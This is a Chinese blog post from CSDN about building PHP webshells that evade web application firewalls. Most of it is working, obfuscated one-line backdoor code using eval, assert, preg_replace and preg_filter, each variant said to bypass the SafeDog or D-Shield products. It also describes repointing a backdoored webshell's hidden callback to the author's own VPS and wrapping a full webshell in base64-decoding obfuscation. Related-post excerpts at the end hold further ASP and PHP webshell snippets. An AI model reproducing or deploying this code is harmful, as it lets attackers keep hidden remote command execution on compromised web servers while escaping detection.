shell 免杀aspx_Webshell免杀

最新推荐文章于 2024-05-20 08:36:07 发布
最新推荐文章于 2024-05-20 08:36:07 发布
阅读量612 收藏 1
点赞数
文章标签: shell 免杀aspx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39656513/article/details/112817892
版权

一句话木马

在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。

最常见的php一句话木马<?php   @eval($_POST['x']);?>

这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。

本着这个原则,尝试改写一句话木马绕过WAF。

搜集了几个常用的php函数

执行代码的eval、assert、preg_replace

接收数据的$_POST、$_GET、$_REQUEST

php一句话免杀

str_rot13函数<?php

$c=str_rot13('nffreg');

$c($_REQUEST['x']);

?>

str_rot13函数来替代assert。该函数对字符串执行ROT13编码。ROT13编码就是把每个字母在字母表中移动13位。

测试发现无法绕过安全狗。修改一下。<?php

function xiaoma($a){

$c=str_rot13('nffreg');

$c($a);

}

xiaoma($_REQUEST['x']);

?>

即可绕过安全狗。<?php

class One{

function xiaoma($x){

$c=str_rot13('n!ff!re!nffreg');

$str=explode('!',$c)[3];

$str($x);

}

}

$test=new One();

$test->xiaoma($_REQUEST['x']);

?>

再次修改,加了explode函数分割字符串,class封装类。可绕过D盾。

array_map函数

array_map() 函数将函数作用到数组中的每个值上,并返回一个新的数组。<?php

$a1=array("1234","123456");

$a2=array(@$_REQUEST['x'],"1234");

$a=array_map(null,$a1,$a2)[0][1];

assert($a);

?>

即可绕过安全狗。

array_key函数

array_key() 函数也是返回包含数组的一个新数组。<?php

$a=array($_REQUEST['x']=>"3");

$b=array_keys($a)[0];

eval($b);

?>

索引数组变化为关联数组。

即可绕过安全狗、D盾。

preg_replace函数

用来正则匹配的一个函数。<?php

function func(){

return $_REQUEST['x'];

}

preg_replace("/test/e",func(),"i am test");

?>

/e用来当做php代码解析。5.6版本以下实用。

测试可绕过安全狗和D盾。

preg_filter函数

根据preg_replace修改为preg_filter函数,也是用来执行正则的匹配替换。<?php

$a=preg_filter('/\s+/','','as s er t');

$a($_REQUEST['x']);

?>

也可以绕过D盾、安全狗。

其他<?php

function test($a){

$arr = array('a','s','s','e','r','t');

$func = '';

for($i=0;$i

$func.=$func.$arr[$i];

}

$func=substr($func,-6);

$func($a);

}

test($_REQUEST['x']);

?>

也可以绕过D盾、安全狗。

php免杀大马

正好自己手里有一个php大马。但不免杀。尝试将源码base64加密后修改为php免杀大马。

将大马eval函数变为exit或者echo。burp抓取源代码。

将源代码拷贝下来,审计发现给源码存在一处后门。

base64解码一下

哦!!!真是可以。

将该base64地址修改为自己的vps地址。嘻嘻。

那现在只要eval函数可以执行这传base64的字符串就可以啦。

WAF对base64_encode、base64_decode查杀非常严格。

不断搜索、修改、编写,最终成功。<?php

header("Content-type: text/html; charset=utf-8");

class one{

public function dama(){

$l='base';

$o='64_de';

$v='co';

$e='de';

$love=$l.$o.$v.$e;

$c="love";

$shellname='网站安全检测';

$password='xxx';

$myurl='http://www.xxx.com';

$a=$$c('code');//php源码

@eval($a);

}

}

$person = new one;

$person->dama();

?>

直接将php大马源码放在code处。即可。

也可以改造php免杀一句话木马。

比如这款<?php

header("Content-type: text/html; charset=utf-8");

function test($code){

$password='xxx';

$a=preg_filter('/\s+/','','base 64 _ deco de');

$c=$a($code);

@eval($c);

}

$code='';//code存放php大马

test($code);

?>

访问一下。

查看vps是否接收到。

参考资料:

关注我们

我是Tide安全团队的CSeroad,对web安全感兴趣的小伙伴可以关注或加入我们。Tide安全团队http://www.tidesec.net/

weixin_39656513
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php超小大马_超小PHP小马小结(方便查找后门的朋友)
weixin_39579483的博客
12-30 846
作者: spider我也来个超小PHP小马复制代码 代码如下:header("content-Type: text/html; charset=gb2312");if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);?>保存文件名: if(isset($_POST['file...
shell aspx_对于aspwebshell的一些总结
weixin_31235909的博客
12-31 627
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
php小马怎么打开,php小马是什么
weixin_33687939的博客
03-09 894
php小马是什么?php小马也就是一句话木马,就是指只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。我们如何发送命令,发送的命令如何执行?我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE...
shell aspx_避开eval关键字,打造一句话木马
weixin_30304773的博客
01-16 1935
这年头留个php一句话木马,随便就被了,但具我所知,软和运维人员的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?首先我想到的是将eval从字符串类型赋给一个变量。如:$func = 'phpinfo';$func();这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想...
混淆代码如何破解/Webshell混淆的一些思路_小白信息安全笔记
最新发布
程序员六七的博客
05-20 800
1、简介为了避软检测到,黑客们会对进行混淆。本文将介绍一些混淆的思路,帮助安全人员更好地防范攻击。静态是指通过对恶意软件进行混淆、加密或其他技术手段
PHP小马,大马实现分析编写
热门推荐
Love&Share
03-15 1万+
PHP工具开发 PHP小马 简单隐藏 登陆密码 实现写入文件 <?php $pass = '14e1b600b1fd579f47433b88e8d85291'; #123456 $get = $_GET['pass']; if (!empty($get)) { if (md5(md5($get))) { if (!empty($_POST)) { $path=$_POST['filepath']; $content=$_P
webshell小工具
wo41ge的博客
12-25 554
ASP绕过 相比于php ,asp就很不灵活了,许多编码函数不自带,注释无法隔断函数关键字与括号。 但是依然有不少方法可以绕过 首先asp的一句话木马如下: <%execute(request("x"))%> 使用函数分割关键字 <% Function b(): b = request("x") End Function Function a(): eXecUTe(b()) End Function a() %> 连接密码:x 批量脚本 import r
天蝎1_天蝎webshell_webshell管理_
10-01
webshell管理工具天蝎,是由冰蝎变种,可以绕过各种检测设备。
webshell,包含asp,php,aspx,jsp
08-15
ASPx Webshell通常是在.NET环境中运行的后门,如"C99Shell"。防止ASPx Webshell的方法包括使用最新的.NET Framework,定期扫描并修复代码中的漏洞,以及利用.NET的安全特性如角色管理和身份验证。 4. JSP(Java...
WebShell:Webshel​​l &&后门集合
02-05
WebShell的这是一个Webshel​​l开源项目类别ar Ascx 阿什克斯阿斯玛克斯天冬氨酸Aspx C Cfm Cgi Java脚本Jsp px 执照MySQL的Nginx的其他p l 自述文件SSH协议肥皂乌德普微信狗狗icmp 罐节点js 开火操作系统pwnginx ...
aspx webshell
10-11
aspx webshell 绿色,环保
第六十六课:借助aspx对payload进行分离1
08-03
靶机背景:msf exploit(multi/handler) > set lhost 192.168.1.5msf exploit(multi/handler
NTFS权限设置以避通过webshell遍历主机目录
01-20
测试环境:Windows 2003 + IIS6.0 + Access数据库运行上传的asp助手,在浏览其他分区的时候提示“路径未找到”,用asp探针查看发现是因为对分区没有读取权限。我们知道,匿名访问web使用系统中的“IUSR_主机名”这个...
一句话木马
weixin_47836220的博客
12-11 2382
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 常见的一句话木马: php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%> 【基本原理】利用文件上传漏洞,往目标网
php webshell探索-常见小马
qq_44370676的博客
12-11 4508
webshell一.何为webshell二.常见小马探索1.直接型2.通过反射类调用3.通过排序函数调用4.通过类的混淆1.类的魔术方法2.类的自定义方法3.通过反射获取类的注释5.通过函数的混淆6.普通的混淆7.其他的隐藏方式1.ob_start2.register_shutdown_function3.回调函数4.数组5.反引号 一.何为webshell 黑客通过一定途径将webshell上传至服务器具有执行权限(必须要有执行权限才可以,没有执行权限是没有用的)的WEB目录下。远程访问webshell
脚本语言与
Resets_的博客
08-09 982
web预先知识
河马php一句话木马,一句话木马的套路
weixin_42127020的博客
03-10 357
0x01 前言尽最大努力在一文中让大家掌握一些有用的 WEBSHELL 技巧。0x02 关于 eval 于 assert关于 eval 函数在 php 给出的官方说明是eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 (),让系统认为该值是一个函数,从而当做函数来执行通俗的说比如你这样是不行的 也造就了用...
shell aspx_记一次aspx网站渗透
weixin_42128141的博客
12-29 1552
通过前期信息搜集获取到目标站的80xx端口发现一处源码泄露查看配置文件登录manage.aspx上传shell发现安装了TeamViewer看下进程如果运行tv的话,可直接读取其远程的账号密码https://github.com/uknowsec/SharpDecryptPwdSharpDecryptPwd对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,T...
无限D盾脚本之aspx ——yzddMr6
yzddMr6的博客
11-19 3508
前言 自己曾经写过一篇文章:利用随机异或无限某盾 php的webshell方法有很多,但是市面上很少有讲aspx的文章. 因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的 0x01 主要方法 字符串拼接 函数 数组 Base64编码 0x02 了解aspx一句话 Aspx的一句话一般是使用Jscript语言实...
webshell
10-17
我理解你的问题是如何编写一个的 webshell。这是一个非常敏感的话题,因为 webshell 的使用可能会导致安全漏洞和数据泄露。因此,我不会提供任何有关编写 webshell 的具体指导。相反,我可以给你一些建议,以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值